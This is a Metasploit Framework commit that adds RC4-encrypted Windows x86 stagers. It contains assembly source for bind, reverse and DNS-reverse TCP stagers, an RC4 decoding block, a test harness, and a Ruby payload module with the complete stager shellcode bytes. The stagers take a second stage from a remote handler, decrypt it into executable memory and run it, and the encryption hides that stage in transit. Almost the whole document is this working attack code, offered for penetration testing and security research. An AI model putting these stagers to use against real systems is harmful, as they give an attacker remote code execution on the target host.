Land rapid7#1223

This adds rc4-encrypting stagers for Windows.

[Closes rapid7#1223]

Author: egypt

external/source/shellcode/windows/x86/build.py

@@ -75,13 +75,15 @@ def xmit( name, dump_ruby=True ):
   xmit_offset( data, "EggTag1", pack( "<L", 0xDEADDEAD ) )  # Egg tag 1
   xmit_offset( data, "EggTag2", pack( "<L", 0xC0DEC0DE ) )  # Egg tag 2
   xmit_offset( data, "EggTagSize", pack( ">H", 0x1122 ) )   # Egg tag size
+  xmit_offset( data, "RC4Key", "RC4KeyMetasploit")          # RC4 key
+  xmit_offset( data, "XORKey", "XORK")                      # XOR key
   if( name.find( "egghunter" ) >= 0 ):
 	  null_count = data.count( "\x00" )
 	  if( null_count > 0 ):
 		print "# Note: %d NULL bytes found." % ( null_count )
   if dump_ruby:
     xmit_dump_ruby( data )
-#=============================================================================#
+#=============================================================================#
 def main( argv=None ):
   if not argv:
     argv = sys.argv

external/source/shellcode/windows/x86/src/block/block_rc4.asm

@@ -0,0 +1,50 @@
+;-----------------------------------------------------------------------------;
+; Author: Michael Schierl (schierlm[at]gmx[dot]de)
+; Version: 1.0 (29 December 2012)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP - Data to decode
+;        ECX - Data length
+;        ESI - Key (16 bytes for simplicity)
+;        EDI - pointer to 0x100 bytes scratch space for S-box
+; Direction flag has to be cleared
+; Output: None. Data is decoded in place.
+; Clobbers: EAX, EBX, ECX, EDX, EBP (stack is not used)
+
+  ; Initialize S-box
+  xor eax, eax           ; Start with 0
+init:
+  stosb                  ; Store next S-Box byte S[i] = i
+  inc al                 ; increase byte to write (EDI is increased automatically)
+  jnz init               ; loop until we wrap around
+  sub edi, 0x100         ; restore EDI
+
+  ; permute S-box according to key
+  xor ebx, ebx           ; Clear EBX (EAX is already cleared)
+permute:
+  add bl, [edi+eax]      ; BL += S[AL] + KEY[AL % 16]
+  mov edx, eax
+  and dl, 0xF
+  add bl, [esi+edx]
+  mov dl, [edi+eax]      ; swap S[AL] and S[BL]
+  xchg dl, [edi+ebx]
+  mov [edi+eax], dl
+  inc al                 ; AL += 1 until we wrap around
+  jnz permute
+
+
+  ; decryption loop
+  xor ebx, ebx           ; Clear EBX (EAX is already cleared)
+decrypt:
+  inc al                 ; AL += 1
+  add bl, [edi+eax]      ; BL += S[AL]
+  mov dl, [edi+eax]      ; swap S[AL] and S[BL]
+  xchg dl, [edi+ebx]
+  mov [edi+eax], dl
+  add dl, [edi+ebx]      ; DL = S[AL]+S[BL]
+  mov dl, [edi+edx]      ; DL = S[DL]
+  xor [ebp], dl          ; [EBP] ^= DL
+  inc ebp                ; advance data pointer
+  dec ecx                ; reduce counter
+  jnz decrypt            ; until finished

external/source/shellcode/windows/x86/src/block/block_recv_rc4.asm

@@ -0,0 +1,66 @@
+;-----------------------------------------------------------------------------;
+; Authors: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+;          Michael Schierl (schierlm[at]gmx[dot]de)        [RC4 support]
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (31 December 2012)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Same as block_recv, only that the length will be XORed and the stage will be RC4 decoded.
+; Differences to block_recv are indented two more spaces.
+
+; Compatible: block_bind_tcp, block_reverse_tcp
+
+; Input: EBP must be the address of 'api_call'. EDI must be the socket. ESI is a pointer on stack.
+; Output: None.
+; Clobbers: EAX, EBX, ECX, EDX, ESI, (ESP will also be modified)
+
+recv:
+  ; Receive the size of the incoming second stage...
+  push byte 0            ; flags
+  push byte 4            ; length = sizeof( DWORD );
+  push esi               ; the 4 byte buffer on the stack to hold the second stage length
+  push edi               ; the saved socket
+  push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
+  call ebp               ; recv( s, &dwLength, 4, 0 );
+  ; Alloc a RWX buffer for the second stage
+  mov esi, [esi]         ; dereference the pointer to the second stage length
+    xor esi, "XORK"      ; XOR the stage length
+    lea ecx, [esi+0x00]  ; ECX = stage length + S-box length (alloc length)
+  push byte 0x40         ; PAGE_EXECUTE_READWRITE
+  push 0x1000            ; MEM_COMMIT
+;  push esi               ; push the newly recieved second stage length.
+    push ecx             ; push the alloc length
+  push byte 0            ; NULL as we dont care where the allocation is.
+  push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+  call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+  ; Receive the second stage and execute it...
+;  xchg ebx, eax          ; ebx = our new memory address for the new stage + S-box
+    lea ebx, [eax+0x100] ; EBX = new stage address
+  push ebx               ; push the address of the new stage so we can return into it
+    push esi             ; push stage length
+    push eax             ; push the address of the S-box
+read_more:               ;
+  push byte 0            ; flags
+  push esi               ; length
+  push ebx               ; the current address into our second stage's RWX buffer
+  push edi               ; the saved socket
+  push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
+  call ebp               ; recv( s, buffer, length, 0 );
+  add ebx, eax           ; buffer += bytes_received
+  sub esi, eax           ; length -= bytes_received
+  test esi, esi          ; test length
+  jnz read_more          ; continue if we have more to read
+    pop ebx              ; address of S-box
+    pop ecx              ; stage length
+    pop ebp              ; address of stage
+    push ebp             ; push back so we can return into it
+    push edi             ; save socket
+    mov edi, ebx         ; address of S-box
+    call after_key       ; Call after_key, this pushes the address of the key onto the stack.
+    db "RC4KeyMetasploit"
+after_key:
+    pop esi                ; ESI = RC4 key
+%include "./src/block/block_rc4.asm"
+    pop edi              ; restore socket
+  ret                    ; return into the second stage

external/source/shellcode/windows/x86/src/stager/stager_bind_tcp_rc4.asm

@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Authors: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+;          Michael Schierl (schierlm[at]gmx[dot]de)        [RC4 support]
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (31 December 2012)
+; Size: 413 bytes
+; Build: >build.py stager_bind_tcp_rc4
+;-----------------------------------------------------------------------------;
+[BITS 32]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop ebp                ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_bind_tcp.asm"
+  ; By here we will have performed the bind_tcp connection and EDI will be our socket.
+%include "./src/block/block_recv_rc4.asm"
+  ; By now we will have received in the second stage into a RWX buffer and be executing it

external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_rc4.asm

@@ -0,0 +1,21 @@
+;-----------------------------------------------------------------------------;
+; Authors: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+;          Michael Schierl (schierlm[at]gmx[dot]de)        [RC4 support]
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (31 December 2012)
+; Size: 405 bytes
+; Build: >build.py stager_reverse_tcp_rc4
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop ebp                ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_reverse_tcp.asm"
+  ; By here we will have performed the reverse_tcp connection and EDI will be our socket.
+%include "./src/block/block_recv_rc4.asm"
+  ; By now we will have recieved in the second stage into a RWX buffer and be executing it

external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_rc4_dns.asm

@@ -0,0 +1,22 @@
+;-----------------------------------------------------------------------------;
+; Authors: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+;          Michael Schierl (schierlm[at]gmx[dot]de)        [RC4 support]
+;	   Boris Lukashev (rageltman[at]sempervictus)	   [DNS support]
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (31 December 2012)
+; Size: 405 bytes
+; Build: >build.py stager_reverse_tcp_rc4_dns
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop ebp                ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_reverse_tcp_dns.asm"
+  ; By here we will have performed the reverse_tcp connection and EDI will be our socket.
+%include "./src/block/block_recv_rc4.asm"
+  ; By now we will have recieved in the second stage into a RWX buffer and be executing it

external/source/shellcode/windows/x86/src/test_rc4.asm

@@ -0,0 +1,43 @@
+;-----------------------------------------------------------------------------;
+; Author: Michael Schierl (schierlm[at]gmx[dot]de)
+; Version: 1.0 (29 December 2012)
+;-----------------------------------------------------------------------------;
+
+;
+; c1 = OpenSSL::Cipher::Cipher.new('RC4')
+; c1.encrypt
+; c1.key="Hello, my world!"
+; c1.update("This is some magic data you may want to have encoded and decoded again").unpack("H*")
+;
+; => "882353c5de0f5e6b10bf0d25c432c5d16424dc797e895f37f261c893b31d577e7e69f77e07aa576d58c7f757164e7d74988feb10f972b28dcfa1e3a2b1cc0b0fa1a8b116294b"
+;
+; c1 = OpenSSL::Cipher::Cipher.new('RC4')
+; c1.decrypt
+; c1.key="Hello, my world!"
+; c1.update(["882353c5de0f5e6b10bf0d25c432c5d16424dc797e895f37f261c893b31d577e7e69f77e07aa576d58c7f757164e7d74988feb10f972b28dcfa1e3a2b1cc0b0fa1a8b116294b"].pack("H*"))
+;
+; => "This is some magic data you may want to have encoded and decoded again"
+;
+
+[BITS 32]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  call pushkey           ; push the address of the key onto the stack
+  db "Hello, my world!"
+pushkey:
+  pop esi                ; and store it into ESI
+  call pushdata          ; push the address of the encrypted data on the stack
+  db 0x88, 0x23, 0x53, 0xc5, 0xde, 0x0f, 0x5e, 0x6b, 0x10, 0xbf, 0x0d, 0x25, 0xc4, 0x32, 0xc5, 0xd1, 0x64, 0x24, 0xdc, 0x79, 0x7e, 0x89, 0x5f, 0x37, 0xf2, 0x61, 0xc8, 0x93, 0xb3, 0x1d, 0x57, 0x7e, 0x7e, 0x69, 0xf7, 0x7e, 0x07, 0xaa, 0x57, 0x6d, 0x58, 0xc7, 0xf7, 0x57, 0x16, 0x4e, 0x7d, 0x74, 0x98, 0x8f, 0xeb, 0x10, 0xf9, 0x72, 0xb2, 0x8d, 0xcf, 0xa1, 0xe3, 0xa2, 0xb1, 0xcc, 0x0b, 0x0f, 0xa1, 0xa8, 0xb1, 0x16, 0x29, 0x4b
+pushdata:
+  pop ebp                ; and store it into EBP
+  mov ecx, 70            ; store data length into ECX
+  sub esp, 0x100         ; make space on stack for S-Box
+  mov edi, esp           ; and store address into EDI
+  nop
+  nop
+  nop
+  int 3                  ; for stepping through the code
+                         ; let's run the RC4 decoder
+%include "./src/block/block_rc4.asm"
+  int 3                  ; EBP should point to decoded data now

modules/payloads/stagers/windows/bind_tcp_rc4.rb

@@ -0,0 +1,111 @@
+# -*- coding: binary -*-
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Windows
+
+	def self.handler_type_alias
+		"bind_tcp_rc4"
+	end
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Bind TCP Stager (RC4 stage encryption)',
+			'Description'   => 'Listen for a connection',
+			'Author'        => ['hdm', 'skape', 'sf', 'mihi'],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Convention'    => 'sockedi',
+			'Stager'        =>
+				{
+					'RequiresMidstager' => false,
+					'Offsets' =>
+						{
+							'LPORT'  => [ 200, 'n' ],
+							'XORKey' => [ 260, '' ],
+							'RC4Key' => [ 324, '' ]
+						},
+					'Payload' =>
+						# Length: 411 bytes
+						"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
+						"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
+						"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
+						"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
+						"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
+						"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
+						"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
+						"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
+						"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
+						"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
+						"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
+						"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
+						"\xD5\x97\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57" +
+						"\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5" +
+						"\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D" +
+						"\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5" +
+						"\x8B\x36\x81\xF6\x58\x4F\x52\x4B\x8D\x0E\x6A\x40\x68\x00\x10\x00" +
+						"\x00\x51\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x8D\x98\x00\x01\x00" +
+						"\x00\x53\x56\x50\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5" +
+						"\x01\xC3\x29\xC6\x85\xF6\x75\xEC\x5B\x59\x5D\x55\x57\x89\xDF\xE8" +
+						"\x10\x00\x00\x00\x52\x43\x34\x4B\x65\x79\x4D\x65\x74\x61\x73\x70" +
+						"\x6C\x6F\x69\x74\x5E\x31\xC0\xAA\xFE\xC0\x75\xFB\x81\xEF\x00\x01" +
+						"\x00\x00\x31\xDB\x02\x1C\x07\x89\xC2\x80\xE2\x0F\x02\x1C\x16\x8A" +
+						"\x14\x07\x86\x14\x1F\x88\x14\x07\xFE\xC0\x75\xE8\x31\xDB\xFE\xC0" +
+						"\x02\x1C\x07\x8A\x14\x07\x86\x14\x1F\x88\x14\x07\x02\x14\x1F\x8A" +
+						"\x14\x17\x30\x55\x00\x45\x49\x75\xE5\x5F\xC3"
+				}
+			))
+
+		register_options([
+			OptString.new("RC4PASSWORD", [true, "Password to derive RC4 key from"])
+		], self.class)
+	end
+
+	def generate_stage
+		p = super
+		m = OpenSSL::Digest::Digest.new('sha1')
+		m.reset
+		key = m.digest(datastore["RC4PASSWORD"] || "")
+		c1 = OpenSSL::Cipher::Cipher.new('RC4')
+		c1.decrypt
+		c1.key=key[4,16]
+		p = c1.update(p)
+		return [ p.length ^ key[0,4].unpack('V')[0] ].pack('V') + p
+	end
+
+	def internal_generate
+		p = super
+		m = OpenSSL::Digest::Digest.new('sha1')
+		m.reset
+		key = m.digest(datastore["RC4PASSWORD"] || "")
+		p[offsets['XORKey'][0], 4] = key[0,4]
+		p[offsets['RC4Key'][0], 16] = key[4,16]
+		return p
+	end
+
+	def replace_var(raw, name, offset, pack)
+		if (name == 'XORKey' or name == 'RC4Key')
+			#will be replaced by internal_generate
+			return true
+		end
+		super
+	end
+
+	def handle_intermediate_stage(conn, payload)
+		return false
+	end
+end